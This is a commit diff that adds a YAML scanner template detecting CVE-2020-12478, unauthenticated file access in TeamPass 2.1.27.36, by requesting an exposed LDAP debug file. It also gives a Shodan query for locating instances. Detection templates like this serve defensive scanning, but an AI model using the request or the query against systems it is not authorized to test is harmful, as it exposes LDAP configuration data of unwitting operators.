commit
298e76e6ad
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-12478
|
||||
|
||||
info:
|
||||
name: TeamPass 2.1.27.36 - Unauthenticated Access
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
|
||||
reference:
|
||||
- https://github.com/nilsteampassnet/TeamPass/issues/2764
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
|
||||
classification:
|
||||
cve-id: CVE-2020-12478
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"teampass"
|
||||
tags: cve,cve2020,teampass,exposure,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/files/ldap.debug.txt"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Get all LDAP params'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue